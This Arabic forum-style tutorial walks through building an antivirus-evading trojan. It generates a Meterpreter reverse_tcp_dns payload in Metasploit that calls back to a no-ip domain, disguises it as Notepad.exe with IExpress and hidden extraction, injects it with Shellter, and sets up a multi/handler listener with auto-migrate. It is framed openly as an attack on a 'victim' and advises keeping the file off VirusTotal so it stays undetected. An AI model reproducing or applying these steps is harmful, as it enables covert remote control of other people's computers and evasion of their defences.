السلام عليكم.
في هذا الشرح سنقوم بانشاء طورجان متربريتر مشفر باستعمال اسم دومين. المرحلة الأولى حول طريقة انشاء سيرفر dns (انا استعمل نو اي بي no-ip) .
و المرحلة الثانية حول انشاء ملف تنفيدي و ثالثا استخدام كلا الملفين (الملف التنفيدي ويندوز +
السيرفر ) و اخيرا التصنت باستعمال الارميتاج على سيرفر و بورت الاختراق.
الشرح بسيط ان شاء الله كلشي يستفيد
الأدوات التي تحتاج اليها:
- كالي لينكس https://www.kali.org/
- ويندوز
- حساب نو ايبي مربوط بدومين http://www.noip.com/
- بورت الاخراق مفتوح في الراوتر
- برنامج شيلتر https://www.shellterproject.com/download/
الجزء الأول :انشاء سيرفر دي ان اس باستعمال الكالي
افتح برنامج الميتاسبولت في شاشة الأوامر باستعمال الأمر
نختار
السيرفر التالي بالامر
كود:
use payload/windows/meterpreter/reverse_tcp_dns
نأمر الميتا لاظهار خصائص
السيرفر يجب ان تضع
lhost = الهوست الذي تم انشاءه مع النو اي بي بدون البرتكول http://
lport = رقم البورت الذي فتحته في الراتور
ثم نضع الأمر التالي لاظهار خصائص انشاء السيرفر
ثم الأمر التالي لانشاء
السيرفر كود:
generate -f DNS -p windows -t raw
مع DNS= اسم
السيرفر الذي تريد
الأن نغلق شاشة الأوامر و نفتح مدير الملفات سنجد السرفر الذي تم انشاءه في home folder
الجزء الثاني: انشاء الملف التنفيذي في وندوز
اختر الخاصية التي تناسبك (مع العلم أن برنامج شيلتر ليس متوافق مع برامج 64 بايت) ه
لأصحاب 32 بايت نذهب الى
كود:
C:\Windows\System32\iexpress.exe و كليك يمين و نشغله كمدير run as administrator
لمن لديه بلاتفورم 64 بايت ننتقل الى
كود:
C:\Windows\SysWOW64\iexpress.exe (Right click and select run as administrator)
نختار
Create new Self Extraction Directive File ثم next. ثمnext on the Package Purpose page
نضع أي شيء في عنوان الباكتاج مثل
Ex: Notepad.exe
No Prompt, اضغط next
Do not display a license, اضغط next
اغضط add و اختر اي برنامج في النظام أنا مثلا اخترت Notepad.exe في C:\Windows\System32. اضغط next .
اضغط drop arrow و اختر اسم مثل الذي اخترت في الأول
نغضط على التصفح browse و نكتب اسم البرنامج و مساره مع تفعيل خاصية Hide File Extracting Progress Animation from user. Click Next.
اختر No restart و اضغط next --> next --> next الى انشاء الملف ثم انهاء Finish. .
الجزء الثالث: استخدام كلا الملفين لانشاء الطورجان الخاص بنا
افتح مجلد شيلتر و افتح البرنامج كمدير
+ ضع A لـ Auto.
+ ضع N لـ No.
اختر مسار البرنامج الذي قمنا بانشاءه في الجزء الثاني و أترك البرنامج ليقوم بشغله أقل من دقيقة، و عندما يطلب مسار
السيرفر ضع مكان
السيرفر من الجزء 1 بعد نسخه للجهاز طبعا
+ ضع C لـ custom.
+ ضع مسار السيرفر.
+ ضع N لـ No reflective DLL loader.
اضغط enter وضع البرنامج يعمل عندما نحصل على رسالة Injection Verified سيكون لديك طورجان مشفر مبروك
الجزء الرابع : التصنت على الأرميتاج
تستطيع استعمال ارميتاج او كوبالت سترايك أو حتى الميتا حسب الرغبة أنا أستعمل ارميتاج
نعود لنظام الكالي
نفتح شاشة الأوامر و نكتب
للتحديث
و اتبع التالي
كود:
apt-get install armitage
اضغط Connect
اضغط Yes
عندما تفتح معنا شاشة الارميتاج أو الميتا نكتب التالي
كود:
use exploit/multi/handler
مع lhost عنوان الايبي الخارجي
مع lport رقم البورت الدي اخترناه للسيرفر
كود:
set payload windows/meterpreter/reverse tcp dns
كود:
set exitonsession false
ان اردت اضافة الأمر
كود:
set autorunscript migrate -f
و
كود:
set prependmigrate True
أخيرا
بعد ارسال الطرورجان و تشغيله من طرف الضحية مبروك عليكم
ملاحظة:
لا ترفع الطرورجان على مواقع الفحص التي ترسل القيم مثل فايروس تاوتال
- سيرفر زعما payload
- موضوع ليس منقول بل مخدوم
شكرا على المتابعة، اي استفسار تفضلوا